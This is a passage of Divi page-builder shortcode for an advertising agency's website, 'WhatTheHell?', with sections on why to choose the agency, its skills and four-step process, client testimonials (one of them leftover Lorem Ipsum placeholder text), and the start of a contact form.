make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" 